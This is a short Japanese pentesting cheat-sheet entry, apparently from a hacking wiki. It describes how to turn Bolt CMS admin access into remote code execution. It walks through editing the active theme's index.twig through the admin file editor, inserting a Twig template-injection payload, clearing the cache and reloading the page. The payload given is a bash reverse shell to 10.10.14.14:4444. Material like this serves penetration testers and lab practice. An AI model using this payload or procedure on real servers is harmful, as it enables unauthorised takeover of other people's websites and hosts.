Bolt CMS
RCE
管理者としてログインした後(ログインプロンプトにアクセスするには/botに移動します)、Bolt CMSでRCEを取得できます:
Configuration
を選択 ->View Configuration
->Main Configuration
またはURLパス/bolt/file-edit/config?file=/bolt/config.yaml
に移動themeの値を確認します
File management
を選択 ->View & edit templates
前のステップで見つかったテーマベース(この場合はbase-2021)を選択し、
index.twig
を選択します私の場合、URLパスは/bolt/file-edit/themes?file=/base-2021/index.twigにあります
テンプレートインジェクション(Twig)を介してこのファイルにペイロードを設定します。例:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
そして変更を保存します
Maintenance
->Clear the cache
でキャッシュをクリアします通常のユーザーとして再度ページにアクセスし、ペイロードが実行されるはずです
Last updated